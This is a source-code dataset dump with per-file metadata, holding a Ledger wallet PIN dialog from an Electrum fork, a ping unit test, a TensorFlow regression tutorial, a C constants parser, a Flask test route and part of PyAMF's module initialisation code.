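    return address[:i] + '<u><b>' + address[i:i + 1] + '</b></u>' + address[i + 1:]

# e.g. highlight_next_char(addr, [0, 3, 7], '1') bolds the fourth character of addr.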
| 42.787879
| 157
| 0.610057
|
import copy
from PyQt5.QtWidgets import (QDialog, QLineEdit, QTextEdit, QVBoxLayout, QLabel,
QWidget, QHBoxLayout, QComboBox)
from btchip.btchip import BGLhipException
from electrum.gui.qt.util import PasswordLineEdit
from electrum.i18n import _
from electrum import constants, bitgesell
from electrum.logging import get_logger
_logger = get_logger(__name__)
DEBUG = False
helpTxt = [_("Your Ledger Wallet wants to tell you a one-time PIN code.<br><br>" \
"For best security you should unplug your device, open a text editor on another computer, " \
"put your cursor into it, and plug your device into that computer. " \
"It will output a summary of the transaction being signed and a one-time PIN.<br><br>" \
"Verify the transaction summary and type the PIN code here.<br><br>" \
"Before pressing enter, plug the device back into this computer.<br>" ),
_("Verify the address below.<br>Type the character from your security card corresponding to the <u><b>BOLD</b></u> character."),
]
class LedgerAuthDialog(QDialog):
def __init__(self, handler, data):
QDialog.__init__(self, handler.top_level_window())
self.handler = handler
self.txdata = data
self.idxs = self.txdata['keycardData'] if self.txdata['confirmationType'] > 1 else ''
self.setMinimumWidth(650)
self.setWindowTitle(_("Ledger Wallet Authentication"))
self.cfg = copy.deepcopy(self.handler.win.wallet.get_keystore().cfg)
self.dongle = self.handler.win.wallet.get_keystore().get_client().dongle
self.pin = ''
self.devmode = self.getDevice2FAMode()
if self.devmode == 0x11 or self.txdata['confirmationType'] == 1:
self.cfg['mode'] = 0
vbox = QVBoxLayout()
self.setLayout(vbox)
def on_change_mode(idx):
self.cfg['mode'] = 0 if self.devmode == 0x11 else idx if idx > 0 else 1
if self.cfg['mode'] > 0:
self.handler.win.wallet.get_keystore().cfg = self.cfg
self.handler.win.wallet.save_keystore()
self.update_dlg()
def return_pin():
self.pin = self.pintxt.text() if self.txdata['confirmationType'] == 1 else self.cardtxt.text()
if self.cfg['mode'] == 1:
self.pin = ''.join(chr(int(str(i),16)) for i in self.pin)
self.accept()
self.modebox = QWidget()
modelayout = QHBoxLayout()
self.modebox.setLayout(modelayout)
modelayout.addWidget(QLabel(_("Method:")))
self.modes = QComboBox()
modelayout.addWidget(self.modes, 2)
modelayout.addStretch(1)
self.modebox.setMaximumHeight(50)
vbox.addWidget(self.modebox)
self.populate_modes()
self.modes.currentIndexChanged.connect(on_change_mode)
self.helpmsg = QTextEdit()
self.helpmsg.setStyleSheet("QTextEdit { color:black; background-color: lightgray; }")
self.helpmsg.setReadOnly(True)
vbox.addWidget(self.helpmsg)
self.pinbox = QWidget()
pinlayout = QHBoxLayout()
self.pinbox.setLayout(pinlayout)
self.pintxt = PasswordLineEdit()
self.pintxt.setMaxLength(4)
self.pintxt.returnPressed.connect(return_pin)
pinlayout.addWidget(QLabel(_("Enter PIN:")))
pinlayout.addWidget(self.pintxt)
pinlayout.addWidget(QLabel(_("NOT DEVICE PIN - see above")))
pinlayout.addStretch(1)
self.pinbox.setVisible(self.cfg['mode'] == 0)
vbox.addWidget(self.pinbox)
self.cardbox = QWidget()
card = QVBoxLayout()
self.cardbox.setLayout(card)
self.addrtext = QTextEdit()
self.addrtext.setStyleSheet('''
QTextEdit {
color:blue; background-color:lightgray; padding:15px 10px; border:none;
font-size:20pt; font-family: "Courier New", monospace; }
''')
self.addrtext.setReadOnly(True)
self.addrtext.setMaximumHeight(130)
card.addWidget(self.addrtext)
def pin_changed(s):
if len(s) < len(self.idxs):
i = self.idxs[len(s)]
addr = self.txdata['address']
if not constants.net.TESTNET:
text = addr[:i] + '<u><b>' + addr[i:i+1] + '</u></b>' + addr[i+1:]
else:
addr_mainnet = bitgesell.script_to_address(bitgesell.address_to_script(addr), net=constants.BitgesellMainnet)
addr_mainnet = addr_mainnet[:i] + '<u><b>' + addr_mainnet[i:i+1] + '</u></b>' + addr_mainnet[i+1:]
text = str(addr) + '\n' + str(addr_mainnet)
self.addrtext.setHtml(str(text))
else:
self.addrtext.setHtml(_("Press Enter"))
pin_changed('')
cardpin = QHBoxLayout()
cardpin.addWidget(QLabel(_("Enter PIN:")))
self.cardtxt = PasswordLineEdit()
self.cardtxt.setMaxLength(len(self.idxs))
self.cardtxt.textChanged.connect(pin_changed)
self.cardtxt.returnPressed.connect(return_pin)
cardpin.addWidget(self.cardtxt)
cardpin.addWidget(QLabel(_("NOT DEVICE PIN - see above")))
cardpin.addStretch(1)
card.addLayout(cardpin)
self.cardbox.setVisible(self.cfg['mode'] == 1)
vbox.addWidget(self.cardbox)
self.update_dlg()
def populate_modes(self):
self.modes.blockSignals(True)
self.modes.clear()
self.modes.addItem(_("Summary Text PIN (requires dongle replugging)") if self.txdata['confirmationType'] == 1 else _("Summary Text PIN is Disabled"))
if self.txdata['confirmationType'] > 1:
self.modes.addItem(_("Security Card Challenge"))
self.modes.blockSignals(False)
def update_dlg(self):
self.modes.setCurrentIndex(self.cfg['mode'])
self.modebox.setVisible(True)
self.helpmsg.setText(helpTxt[self.cfg['mode']])
self.helpmsg.setMinimumHeight(180 if self.txdata['confirmationType'] == 1 else 100)
self.helpmsg.setVisible(True)
self.pinbox.setVisible(self.cfg['mode'] == 0)
self.cardbox.setVisible(self.cfg['mode'] == 1)
self.pintxt.setFocus(True) if self.cfg['mode'] == 0 else self.cardtxt.setFocus(True)
self.setMaximumHeight(400)
def getDevice2FAMode(self):
apdu = [0xe0, 0x24, 0x01, 0x00, 0x00, 0x01]
try:
mode = self.dongle.exchange( bytearray(apdu) )
return mode
except BGLhipException as e:
_logger.debug('Device getMode Failed')
return 0x11
| true
| true
|
1c42095fa66c2003f5d58eae607de990f19f42e8
| 565
|
py
|
Python
|
py_sys_test/ping_test/ping_icmp_test.py
|
interhui/py-sys
|
5d0f8cf5421a5766ed66d78a5364a017cb38aa3a
|
[
"Apache-2.0"
] | 1
|
2016-03-23T10:25:57.000Z
|
2016-03-23T10:25:57.000Z
|
py_sys_test/ping_test/ping_icmp_test.py
|
vicky-tan/py-sys
|
5d0f8cf5421a5766ed66d78a5364a017cb38aa3a
|
[
"Apache-2.0"
] | null | null | null |
py_sys_test/ping_test/ping_icmp_test.py
|
vicky-tan/py-sys
|
5d0f8cf5421a5766ed66d78a5364a017cb38aa3a
|
[
"Apache-2.0"
] | null | null | null |
# coding=utf-8
import unittest
from py_sys.ping import ping_icmp
class Test(unittest.TestCase):
def test_ping(self):
p = ping_icmp.PingICMP()
result = p.ping('127.0.0.1', 1, 5)
for item in result:
self.assertEqual(item.get('result'), 'success')
def test_ping_timeout(self):
p = ping_icmp.PingICMP()
result = p.ping('192.168.1.2', 1, 5)
for item in result:
self.assertEqual(item.get('result'), 'timeout')
if __name__ == "__main__":
unittest.main()
| 28.25
| 60
| 0.573451
|
import unittest
from py_sys.ping import ping_icmp
class Test(unittest.TestCase):
def test_ping(self):
p = ping_icmp.PingICMP()
result = p.ping('127.0.0.1', 1, 5)
for item in result:
self.assertEqual(item.get('result'), 'success')
def test_ping_timeout(self):
p = ping_icmp.PingICMP()
result = p.ping('192.168.1.2', 1, 5)
for item in result:
self.assertEqual(item.get('result'), 'timeout')
if __name__ == "__main__":
unittest.main()
| true
| true
|
1c420a026350f63f0fc65e8540cbbb62db2549ca
| 2,058
|
py
|
Python
|
_old_basic_tensorflow/tutorial2_simpleRegressionLowLevel/simpleRegressionLowLevel.py
|
UnnamedMoose/LearningMLandRL
|
a3a47998c32078a069ea82ce0032c30bb8b387f2
|
[
"MIT"
] | 2
|
2021-01-29T12:33:35.000Z
|
2021-07-11T05:47:26.000Z
|
_old_basic_tensorflow/tutorial2_simpleRegressionLowLevel/simpleRegressionLowLevel.py
|
UnnamedMoose/LearningMLandRL
|
a3a47998c32078a069ea82ce0032c30bb8b387f2
|
[
"MIT"
] | null | null | null |
_old_basic_tensorflow/tutorial2_simpleRegressionLowLevel/simpleRegressionLowLevel.py
|
UnnamedMoose/LearningMLandRL
|
a3a47998c32078a069ea82ce0032c30bb8b387f2
|
[
"MIT"
] | 1
|
2018-03-14T18:23:10.000Z
|
2018-03-14T18:23:10.000Z
|
import numpy as np
import matplotlib.pyplot as plt
import tensorflow as tf
# correlation variable x and ground truth values
x = tf.constant([[1], [2], [3], [4]], dtype=tf.float32, name="inputData")
y_true = tf.constant([[0], [-1], [-2], [-3]], dtype=tf.float32, name="groundTruth")
# linear model
linear_model = tf.layers.Dense(units=1, name="regressionModel")
# prediction of y from x using the linear model is what we're after
y_pred = linear_model(x)
# loss model that computes mean square error between the ground truth and predictions
loss = tf.losses.mean_squared_error(labels=y_true, predictions=y_pred)
# create an optimiser instance that will tune the coefficients of the graph
# in order to minimise the loss function
optimizer = tf.train.GradientDescentOptimizer(0.01, name="gradientOpt")
train = optimizer.minimize(loss)
# initialiser
init = tf.global_variables_initializer()
# create a writer for graph visualisation; produces an "event" file
writer = tf.summary.FileWriter("./modelData")
writer.add_graph(tf.get_default_graph())
lossTrace = []
with tf.Session() as sess:
# initialise
sess.run(init)
# run the training
for i in range(1000):
_, loss_value = sess.run((train, loss))
lossTrace = np.append(lossTrace, loss_value)
if i%100 == 0:
print("Iter {:2d}, loss ={:7.4f}".format(i, loss_value))
# come up with the final prediction and convert to numpy arrays for further processing
independentVariable = sess.run(x)
finalPred = sess.run(y_pred)
groundTruth = sess.run(y_true)
print("\nFinal prediction: {}".format(finalPred))
print("\nGround truth: {}".format(groundTruth))
plt.figure()
plt.plot(lossTrace, "kp--", ms=5, lw=2)
plt.xlabel("Iteration")
plt.ylabel("Loss [-]")
plt.figure()
plt.plot(independentVariable, groundTruth, "kp--", ms=9, lw=2, label="Ground truth")
plt.plot(independentVariable, finalPred, "rx--", ms=9, lw=2,
markeredgewidth=2, label="Predicted value")
plt.legend(prop={"size":14})
plt.xlabel("x")
plt.ylabel("y")
plt.show()
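For reference, the training data above lies exactly on y = -x + 1, so the Dense layer should converge towards a weight of -1 and a bias of 1. A quick numpy-only sanity check of that closed-form target (separate from the TensorFlow graph, shown only to make the expected result explicit):

import numpy as np

x = np.array([1., 2., 3., 4.])
y = np.array([0., -1., -2., -3.])
# Least-squares fit of y = w*x + b; this is the exact solution that the
# gradient-descent loop above approximates.
A = np.vstack([x, np.ones_like(x)]).T
w, b = np.linalg.lstsq(A, y, rcond=None)[0]
print(w, b)  # approximately -1.0 and 1.0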
| 32.666667
| 90
| 0.706511
|
import numpy as np
import matplotlib.pyplot as plt
import tensorflow as tf
x = tf.constant([[1], [2], [3], [4]], dtype=tf.float32, name="inputData")
y_true = tf.constant([[0], [-1], [-2], [-3]], dtype=tf.float32, name="groundTruth")
linear_model = tf.layers.Dense(units=1, name="regressionModel")
y_pred = linear_model(x)
# loss model that computes mean square error between the ground truth and predictions
loss = tf.losses.mean_squared_error(labels=y_true, predictions=y_pred)
# create an optimiser instance that will tune the coefficients of the graph
# in order to minimise the loss function
optimizer = tf.train.GradientDescentOptimizer(0.01, name="gradientOpt")
train = optimizer.minimize(loss)
# initialiser
init = tf.global_variables_initializer()
# create a writer for graph visualisation; produces an "event" file
writer = tf.summary.FileWriter("./modelData")
writer.add_graph(tf.get_default_graph())
lossTrace = []
with tf.Session() as sess:
# initialise
sess.run(init)
# run the training
for i in range(1000):
_, loss_value = sess.run((train, loss))
lossTrace = np.append(lossTrace, loss_value)
if i%100 == 0:
print("Iter {:2d}, loss ={:7.4f}".format(i, loss_value))
# come up with the final prediction and convert to numpy arrays for further processing
independentVariable = sess.run(x)
finalPred = sess.run(y_pred)
groundTruth = sess.run(y_true)
print("\nFinal prediction: {}".format(finalPred))
print("\nGround truth: {}".format(groundTruth))
plt.figure()
plt.plot(lossTrace, "kp--", ms=5, lw=2)
plt.xlabel("Iteration")
plt.ylabel("Loss [-]")
plt.figure()
plt.plot(independentVariable, groundTruth, "kp--", ms=9, lw=2, label="Ground truth")
plt.plot(independentVariable, finalPred, "rx--", ms=9, lw=2,
markeredgewidth=2, label="Predicted value")
plt.legend(prop={"size":14})
plt.xlabel("x")
plt.ylabel("y")
plt.show()
| true
| true
|
1c420bf7c19855a237c76ab11081492f6b152c52
| 89
|
py
|
Python
|
main.py
|
asa-leholland/GRE-calculator
|
43530e24c2e6059ce03027eec1cce82d4fe70479
|
[
"MIT"
] | null | null | null |
main.py
|
asa-leholland/GRE-calculator
|
43530e24c2e6059ce03027eec1cce82d4fe70479
|
[
"MIT"
] | 1
|
2020-12-08T22:41:41.000Z
|
2020-12-08T22:41:41.000Z
|
main.py
|
asa-leholland/GRE-calculator
|
43530e24c2e6059ce03027eec1cce82d4fe70479
|
[
"MIT"
] | null | null | null |
# main.py
from GRECalculator import Calculator_GRE
Calculator_GRE.run_calculator_app()
| 17.8
| 40
| 0.842697
|
from GRECalculator import Calculator_GRE
Calculator_GRE.run_calculator_app()
| true
| true
|
1c420e114a9eed82cb11c9a5c735161c1461defa
| 6,106
|
py
|
Python
|
constantsgen/constantsparse.py
|
barracudanetworks/constantsgen
|
ff5b0a2d9d297b5da6d4475a91b8180ce9b60f16
|
[
"BSD-3-Clause"
] | null | null | null |
constantsgen/constantsparse.py
|
barracudanetworks/constantsgen
|
ff5b0a2d9d297b5da6d4475a91b8180ce9b60f16
|
[
"BSD-3-Clause"
] | 1
|
2016-12-15T18:41:51.000Z
|
2016-12-15T18:41:51.000Z
|
constantsgen/constantsparse.py
|
barracudanetworks/constantsgen
|
ff5b0a2d9d297b5da6d4475a91b8180ce9b60f16
|
[
"BSD-3-Clause"
] | 1
|
2016-09-25T21:26:54.000Z
|
2016-09-25T21:26:54.000Z
|
import re
import os
from collections import namedtuple, OrderedDict
EnumImport = namedtuple("EnumImport",
"source_name destination_name name_overrides")
# #define constants.
constants = re.compile(r"#define ([^\s]+)\s+(.+)")
# Enums.
enums = re.compile(r"enum[^{]+\{[^}]+\};")
# Name of an enum.
enum_name = re.compile(r"enum\s+([^\s{]+)")
# Enum contents between the braces.
enum_contents = re.compile(r"{([^}]+)};")
# Enum value with an explicit value.
enum_explicit_value = re.compile(r"(?:\s*([^\s]+)\s*=\s*([^\s,]+),?)$",
flags=re.MULTILINE)
# Enum value with an implicit value.
enum_implicit_value = re.compile(r"(?:^\s*([^\s,]+),?$)", flags=re.MULTILINE)
class ConstantsParser:
def __init__(self, input_file):
self.source_files = []
self.imported_constants = {}
self.imported_enums = {}
self.constant_values = OrderedDict()
self.enum_values = OrderedDict()
manual_suffixes = OrderedDict()
section = None
for line in input_file:
# Skip blank lines and comments
if line == "\n" or line.startswith("#"):
continue
# Set section based on header
if line.endswith(":\n"):
section = line[:-2]
continue
if section == "file":
self.source_files.append(line[:-1])
elif section == "constant":
words = line.split()
assert len(words) <= 2
# Export as the source name if only one is provided; otherwise
# use the override.
self.imported_constants[words[0]] = words[-1]
elif section == "enum":
words = line.split()
assert len(words) >= 2
name_overrides = {}
if len(words) > 2:
overrides = words[2:]
# Pairs: source_name dest_name
assert len(overrides) % 2 == 0
index = 0
while index + 1 < len(overrides):
name_overrides[overrides[index]] = overrides[index + 1]
index += 2
target = EnumImport(words[0], words[1], name_overrides)
self.imported_enums[target.source_name] = target
elif section.startswith("manual"):
target_container = None
if section == "manual_prefix":
target_container = self.constant_values
elif section == "manual" or section == "manual_suffix":
target_container = manual_suffixes
if target_container is not None:
# Separate the key, and only the key, by whitespace.
# The remainder of the line is the value.
key, value = line.split(None, 1)
target_container[key] = value.rstrip()
for filename in self.source_files:
# Resolve paths in input file relative to its location.
input_dir = os.path.dirname(input_file.name)
file = open(os.path.join(input_dir, filename)).read()
for constant in constants.findall(file):
name, value = constant
if name not in self.imported_constants:
continue
name = self.imported_constants.pop(name)
self.constant_values[name] = value
for enum in enums.findall(file):
# TODO: Could generate Enum classes only?
# TODO: Option to consider an enum individual constants?
name_search = enum_name.search(enum)
if not name_search:
continue
name = name_search.group(1)
if not name in self.imported_enums:
continue
enum_definition = self.imported_enums.pop(name)
contents = enum_contents.search(enum).group(1)
name = enum_definition.destination_name
self.enum_values[name] = OrderedDict()
enum_values = self.enum_values[name]
explicit_values = enum_explicit_value.findall(contents)
if explicit_values:
for name, value in explicit_values:
if name in enum_definition.name_overrides:
name = enum_definition.name_overrides[name]
enum_values[name] = value
implicit_values = enum_implicit_value.findall(contents)
# If there are any explicit values this assumes either all
# values are explicit or only the first is explicit and the rest
# are implicit.
# TODO: Use C constants for extracted enums?
if implicit_values:
assert len(explicit_values) <= 1
value = 0
if explicit_values:
name = explicit_values[0][0]
if name in enum_definition.name_overrides:
name = enum_definition.name_overrides[name]
value = int(enum_values[name], base=0) + 1
for name in implicit_values:
if name in enum_definition.name_overrides:
name = enum_definition.name_overrides[name]
enum_values[name] = value
value += 1
assert enum_values
if self.imported_constants:
names = list(self.imported_constants)
raise Exception("constants {} not found".format(names))
if self.imported_enums:
names = list(self.imported_enums)
raise Exception("enums {} not found".format(names))
# Add manual suffixes now that all values are loaded.
for name, value in manual_suffixes.items():
self.constant_values[name] = value
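Read back from the parsing loop above, the input file is a set of sections terminated by a colon: 'file' lists headers to scan, 'constant' lines give a #define name with an optional exported override, 'enum' lines give a source enum name, a destination name and optional member-name override pairs, and the 'manual*' sections inject literal key/value pairs. A hypothetical input file (names invented for illustration; it assumes a defs.h next to it that defines the referenced symbols) could look like:

# what to extract and how to rename it
file:
defs.h

constant:
MAX_PACKET_SIZE
INTERNAL_LIMIT EXPORTED_LIMIT

enum:
color_t Color COLOR_RED RED

manual_suffix:
EXTRA_FLAG 0x10

Passing such a file as ConstantsParser(open('constants.txt')) would then populate constant_values and enum_values with the resolved names.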
| 36.783133
| 80
| 0.531281
|
import re
import os
from collections import namedtuple, OrderedDict
EnumImport = namedtuple("EnumImport",
"source_name destination_name name_overrides")
constants = re.compile(r"#define ([^\s]+)\s+(.+)")
enums = re.compile(r"enum[^{]+\{[^}]+\};")
enum_name = re.compile(r"enum\s+([^\s{]+)")
enum_contents = re.compile(r"{([^}]+)};")
enum_explicit_value = re.compile(r"(?:\s*([^\s]+)\s*=\s*([^\s,]+),?)$",
flags=re.MULTILINE)
enum_implicit_value = re.compile(r"(?:^\s*([^\s,]+),?$)", flags=re.MULTILINE)
class ConstantsParser:
def __init__(self, input_file):
self.source_files = []
self.imported_constants = {}
self.imported_enums = {}
self.constant_values = OrderedDict()
self.enum_values = OrderedDict()
manual_suffixes = OrderedDict()
section = None
for line in input_file:
if line == "\n" or line.startswith("#"):
continue
if line.endswith(":\n"):
section = line[:-2]
continue
if section == "file":
self.source_files.append(line[:-1])
elif section == "constant":
words = line.split()
assert len(words) <= 2
self.imported_constants[words[0]] = words[-1]
elif section == "enum":
words = line.split()
assert len(words) >= 2
name_overrides = {}
if len(words) > 2:
overrides = words[2:]
assert len(overrides) % 2 == 0
index = 0
while index + 1 < len(overrides):
name_overrides[overrides[index]] = overrides[index + 1]
index += 2
target = EnumImport(words[0], words[1], name_overrides)
self.imported_enums[target.source_name] = target
elif section.startswith("manual"):
target_container = None
if section == "manual_prefix":
target_container = self.constant_values
elif section == "manual" or section == "manual_suffix":
target_container = manual_suffixes
if target_container is not None:
key, value = line.split(None, 1)
target_container[key] = value.rstrip()
for filename in self.source_files:
input_dir = os.path.dirname(input_file.name)
file = open(os.path.join(input_dir, filename)).read()
for constant in constants.findall(file):
name, value = constant
if name not in self.imported_constants:
continue
name = self.imported_constants.pop(name)
self.constant_values[name] = value
for enum in enums.findall(file):
name_search = enum_name.search(enum)
if not name_search:
continue
name = name_search.group(1)
if not name in self.imported_enums:
continue
enum_definition = self.imported_enums.pop(name)
contents = enum_contents.search(enum).group(1)
name = enum_definition.destination_name
self.enum_values[name] = OrderedDict()
enum_values = self.enum_values[name]
explicit_values = enum_explicit_value.findall(contents)
if explicit_values:
for name, value in explicit_values:
if name in enum_definition.name_overrides:
name = enum_definition.name_overrides[name]
enum_values[name] = value
implicit_values = enum_implicit_value.findall(contents)
if implicit_values:
assert len(explicit_values) <= 1
value = 0
if explicit_values:
name = explicit_values[0][0]
if name in enum_definition.name_overrides:
name = enum_definition.name_overrides[name]
value = int(enum_values[name], base=0) + 1
for name in implicit_values:
if name in enum_definition.name_overrides:
name = enum_definition.name_overrides[name]
enum_values[name] = value
value += 1
assert enum_values
if self.imported_constants:
names = list(self.imported_constants)
raise Exception("constants {} not found".format(names))
if self.imported_enums:
names = list(self.imported_enums)
raise Exception("enums {} not found".format(names))
for name, value in manual_suffixes.items():
self.constant_values[name] = value
| true
| true
|
1c420f99903144b944d2260c5b9ff72eff0c7772
| 274
|
py
|
Python
|
integration/tests_failed/query_invalid_utf8.py
|
jleverenz/hurl
|
b81ca8ab7e0e409ec0c074fd8e118721ff4d3fb3
|
[
"Apache-2.0"
] | null | null | null |
integration/tests_failed/query_invalid_utf8.py
|
jleverenz/hurl
|
b81ca8ab7e0e409ec0c074fd8e118721ff4d3fb3
|
[
"Apache-2.0"
] | null | null | null |
integration/tests_failed/query_invalid_utf8.py
|
jleverenz/hurl
|
b81ca8ab7e0e409ec0c074fd8e118721ff4d3fb3
|
[
"Apache-2.0"
] | null | null | null |
from app import app
from flask import make_response
from io import BytesIO
@app.route("/error-query-invalid-utf8")
def error_query_invalid_utf8():
result = BytesIO()
result.write(b"\xff")
data = result.getvalue()
resp = make_response(data)
return resp
| 21.076923
| 39
| 0.715328
|
from app import app
from flask import make_response
from io import BytesIO
@app.route("/error-query-invalid-utf8")
def error_query_invalid_utf8():
result = BytesIO()
result.write(b"\xff")
data = result.getvalue()
resp = make_response(data)
return resp
| true
| true
|
1c42108de4de8747904799e9ec22da386bb66ec9
| 23,990
|
py
|
Python
|
lib/PyAMF-0.6.1/pyamf/__init__.py
|
MiCHiLU/google_appengine_sdk
|
3da9f20d7e65e26c4938d2c4054bc4f39cbc5522
|
[
"Apache-2.0"
] | 790
|
2015-01-03T02:13:39.000Z
|
2020-05-10T19:53:57.000Z
|
AppServer/lib/PyAMF-0.6.1/pyamf/__init__.py
|
nlake44/appscale
|
6944af660ca4cb772c9b6c2332ab28e5ef4d849f
|
[
"Apache-2.0"
] | 1,361
|
2015-01-08T23:09:40.000Z
|
2020-04-14T00:03:04.000Z
|
AppServer/lib/PyAMF-0.6.1/pyamf/__init__.py
|
nlake44/appscale
|
6944af660ca4cb772c9b6c2332ab28e5ef4d849f
|
[
"Apache-2.0"
] | 155
|
2015-01-08T22:59:31.000Z
|
2020-04-08T08:01:53.000Z
|
# Copyright (c) The PyAMF Project.
# See LICENSE.txt for details.
"""
U{PyAMF<http://pyamf.org>} provides Action Message Format (U{AMF
<http://en.wikipedia.org/wiki/Action_Message_Format>}) support for Python that
is compatible with the Adobe U{Flash Player
<http://en.wikipedia.org/wiki/Flash_Player>}.
@since: October 2007
@status: Production/Stable
"""
import types
import inspect
from pyamf import util, _version
from pyamf.adapters import register_adapters
from pyamf import python
from pyamf.alias import ClassAlias, UnknownClassAlias
__all__ = [
'register_class',
'register_class_loader',
'encode',
'decode',
'__version__',
'version'
]
#: PyAMF version number.
__version__ = version = _version.version
#: Class alias mapping support. Contains two types of keys: The string alias
#: related to the class and the class object itself. Both point to the linked
#: L{ClassAlias} object.
#: @see: L{register_class}, L{unregister_class}, and L{register_package}
CLASS_CACHE = {}
#: Class loaders. An iterable of callables that are handed a string alias and
#: return a class object or C{None} it not handled.
#: @see: L{register_class_loader} and L{unregister_class_loader}
CLASS_LOADERS = set()
#: Custom type map.
#: @see: L{get_type}, L{add_type}, and L{remove_type}
TYPE_MAP = {}
#: Maps error classes to string codes.
#: @see: L{add_error_class} and L{remove_error_class}
ERROR_CLASS_MAP = {
TypeError.__name__: TypeError,
KeyError.__name__: KeyError,
LookupError.__name__: LookupError,
IndexError.__name__: IndexError,
NameError.__name__: NameError,
ValueError.__name__: ValueError
}
#: Alias mapping support.
#: @see: L{get_class_alias}, L{register_alias_type}, and L{unregister_alias_type}
ALIAS_TYPES = {}
#: Specifies that objects are serialized using AMF for ActionScript 1.0
#: and 2.0 that were introduced in the Adobe Flash Player 6.
AMF0 = 0
#: Specifies that objects are serialized using AMF for ActionScript 3.0
#: that was introduced in the Adobe Flash Player 9.
AMF3 = 3
#: Supported AMF encoding types.
#: @see: L{AMF0}, L{AMF3}, and L{DEFAULT_ENCODING}
ENCODING_TYPES = (AMF0, AMF3)
#: Default encoding
DEFAULT_ENCODING = AMF3
class UndefinedType(object):
"""
Represents the C{undefined} value in the Adobe Flash Player client.
"""
def __repr__(self):
return 'pyamf.Undefined'
#: Represents the C{undefined} value in the Adobe Flash Player client.
Undefined = UndefinedType()
class BaseError(Exception):
"""
Base AMF Error.
All AMF related errors should be subclassed from this class.
"""
class DecodeError(BaseError):
"""
Raised if there is an error in decoding an AMF data stream.
"""
class EOStream(BaseError):
"""
Raised if the data stream has come to a natural end.
"""
class ReferenceError(BaseError):
"""
Raised if an AMF data stream refers to a non-existent object or string
reference (in the case of AMF3).
"""
class EncodeError(BaseError):
"""
Raised if the element could not be encoded to AMF.
"""
class ASObject(dict):
"""
Represents a Flash Actionscript Object (typed or untyped).
I supply a C{dict} interface to support C{getattr}/C{setattr} calls.
"""
class __amf__:
dynamic = True
def __getattr__(self, k):
try:
return self[k]
except KeyError:
raise AttributeError('Unknown attribute \'%s\'' % (k,))
def __setattr__(self, k, v):
self[k] = v
def __repr__(self):
return dict.__repr__(self)
def __hash__(self):
return id(self)
class MixedArray(dict):
"""
Used to be able to specify the C{mixedarray} type.
"""
class TypedObject(dict):
"""
This class is used when a strongly typed object is decoded but there is no
registered class to apply it to.
This object can only be used for standard streams - i.e. not externalized
data. If encountered, a L{DecodeError} will be raised.
@ivar alias: The alias of the typed object.
@type alias: C{string}
@since: 0.4
"""
def __init__(self, alias):
dict.__init__(self)
self.alias = alias
def __readamf__(self, o):
raise DecodeError('Unable to decode an externalised stream with '
'class alias \'%s\'.\n\nA class alias was found and because '
'strict mode is False an attempt was made to decode the object '
'automatically. To decode this stream, a registered class with '
'the alias and a corresponding __readamf__ method will be '
'required.' % (self.alias,))
def __writeamf__(self, o):
raise EncodeError('Unable to encode an externalised stream with '
'class alias \'%s\'.\n\nA class alias was found and because '
'strict mode is False an attempt was made to encode the object '
'automatically. To encode this stream, a registered class with '
'the alias and a corresponding __writeamf__ method will be '
'required.' % (self.alias,))
class TypedObjectClassAlias(ClassAlias):
"""
The meta class for L{TypedObject} used to adapt PyAMF.
@since: 0.4
"""
klass = TypedObject
def __init__(self, *args, **kwargs):
ClassAlias.__init__(self, self.klass, kwargs.pop('alias', args[0]))
def createInstance(self, codec=None):
return self.klass(self.alias)
def checkClass(kls, klass):
pass
class ErrorAlias(ClassAlias):
"""
Adapts Python exception objects to Adobe Flash Player error objects.
@since: 0.5
"""
def getCustomProperties(self):
self.exclude_attrs.update(['args'])
def getEncodableAttributes(self, obj, **kwargs):
attrs = ClassAlias.getEncodableAttributes(self, obj, **kwargs)
attrs['message'] = str(obj)
attrs['name'] = obj.__class__.__name__
return attrs
def register_class(klass, alias=None):
"""
Registers a class to be used in the data streaming. This is the equivalent
to the C{[RemoteClass(alias="foobar")]} AS3 metatag.
@return: The registered L{ClassAlias} instance.
@see: L{unregister_class}
"""
meta = util.get_class_meta(klass)
if alias is not None:
meta['alias'] = alias
alias_klass = util.get_class_alias(klass) or ClassAlias
x = alias_klass(klass, defer=True, **meta)
if not x.anonymous:
CLASS_CACHE[x.alias] = x
CLASS_CACHE[klass] = x
return x
def unregister_class(alias):
"""
Opposite of L{register_class}.
@raise UnknownClassAlias: Unknown alias.
"""
try:
x = CLASS_CACHE[alias]
except KeyError:
raise UnknownClassAlias('Unknown alias %r' % (alias,))
if not x.anonymous:
del CLASS_CACHE[x.alias]
del CLASS_CACHE[x.klass]
return x
def get_class_alias(klass_or_alias):
"""
Finds the L{ClassAlias} that is registered to C{klass_or_alias}.
If a string is supplied and no related L{ClassAlias} is found, the alias is
loaded via L{load_class}.
@raise UnknownClassAlias: Unknown alias
"""
if isinstance(klass_or_alias, python.str_types):
try:
return CLASS_CACHE[klass_or_alias]
except KeyError:
return load_class(klass_or_alias)
try:
return CLASS_CACHE[klass_or_alias]
except KeyError:
raise UnknownClassAlias('Unknown alias for %r' % (klass_or_alias,))
def register_class_loader(loader):
"""
Registers a loader that is called to provide the C{class} for a specific
alias.
The C{loader} is provided with one argument, the class alias (as a string).
If the loader succeeds in finding a suitable class then it should return
that class, otherwise it should return C{None}.
An example::
def lazy_load_from_my_module(alias):
if not alias.startswith('foo.bar.'):
return None
from foo import bar
if alias == 'foo.bar.Spam':
return bar.Spam
elif alias == 'foo.bar.Eggs':
return bar.Eggs
pyamf.register_class_loader(lazy_load_from_my_module)
@raise TypeError: C{loader} must be callable
@see: L{unregister_class_loader}
"""
if not hasattr(loader, '__call__'):
raise TypeError("loader must be callable")
CLASS_LOADERS.update([loader])
def unregister_class_loader(loader):
"""
Unregisters a class loader.
@param loader: The class loader to be unregistered.
@raise LookupError: The C{loader} was not registered.
@see: L{register_class_loader}
"""
try:
CLASS_LOADERS.remove(loader)
except KeyError:
raise LookupError("loader not found")
def load_class(alias):
"""
Finds the class registered to the alias.
The search is done in order:
1. Checks if the class name has been registered via L{register_class}
or L{register_package}.
2. Checks all functions registered via L{register_class_loader}.
3. Attempts to load the class via standard module loading techniques.
@param alias: The class name.
@type alias: C{string}
@raise UnknownClassAlias: The C{alias} was not found.
@raise TypeError: Expecting class type or L{ClassAlias} from loader.
@return: Class registered to the alias.
@rtype: C{classobj}
"""
# Try the CLASS_CACHE first
try:
return CLASS_CACHE[alias]
except KeyError:
pass
for loader in CLASS_LOADERS:
klass = loader(alias)
if klass is None:
continue
if isinstance(klass, python.class_types):
return register_class(klass, alias)
elif isinstance(klass, ClassAlias):
CLASS_CACHE[klass.alias] = klass
CLASS_CACHE[klass.klass] = klass
return klass
